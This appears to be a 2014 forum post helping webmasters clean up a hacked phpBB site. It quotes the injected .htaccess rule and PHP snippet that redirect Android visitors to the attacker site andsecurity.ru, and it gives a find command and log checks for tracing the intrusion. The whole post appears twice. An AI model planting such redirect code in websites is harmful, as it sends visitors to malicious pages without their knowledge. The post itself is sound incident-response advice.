Fli
11-16-2014, 07:31 PM
If You had any issue with redirecting your website to hacker website andsecurity.ru
check your hosting files modiffication dates (sort by mod. date)
i found this redirect is triggered from .htaccess and from index.php its on the top of the file.
.htaccess
RewriteEngine onRewriteCond %{HTTP_USER_AGENT} "Android" [NC]
RewriteRule ^(.*)$ http://andsecurity.ru [L,R=302]
index.php
<?php
$ua = $_SERVER['HTTP_USER_AGENT'];
if(stripos("***$ua",'android') !== false){
header("Location: http://andsecurity.ru");
die();
}
?>
<?php
/**
*
* @package phpBB3
* @version $Id$
* @copyright (c) 2005 phpBB Group
* @license http://opensource.org/licenses/gpl-license.php GNU Public License
*
*/
if user agent contains phrasse Android, then website visitor probably using Android phone and it redirect him to hacker website
Also find files that are modiffied/created in same date or around it. For this i use linux command like this:
find /home/myusername/public-html -type f -name "*.php*" -newermt 2014-10-12 ! -newermt 2014-10-14
(it should find files modiffied in around 12-14 of October)
Next check your apache access_log file and find lines that correspond to the file modiffy date. You may find some more details about the person who injected the code.
check your hosting files modiffication dates (sort by mod. date)
i found this redirect is triggered from .htaccess and from index.php its on the top of the file.
.htaccess
RewriteEngine onRewriteCond %{HTTP_USER_AGENT} "Android" [NC]
RewriteRule ^(.*)$ http://andsecurity.ru [L,R=302]
index.php
<?php
$ua = $_SERVER['HTTP_USER_AGENT'];
if(stripos("***$ua",'android') !== false){
header("Location: http://andsecurity.ru");
die();
}
?>
<?php
/**
*
* @package phpBB3
* @version $Id$
* @copyright (c) 2005 phpBB Group
* @license http://opensource.org/licenses/gpl-license.php GNU Public License
*
*/
if user agent contains phrasse Android, then website visitor probably using Android phone and it redirect him to hacker website
Also find files that are modiffied/created in same date or around it. For this i use linux command like this:
find /home/myusername/public-html -type f -name "*.php*" -newermt 2014-10-12 ! -newermt 2014-10-14
(it should find files modiffied in around 12-14 of October)
Next check your apache access_log file and find lines that correspond to the file modiffy date. You may find some more details about the person who injected the code.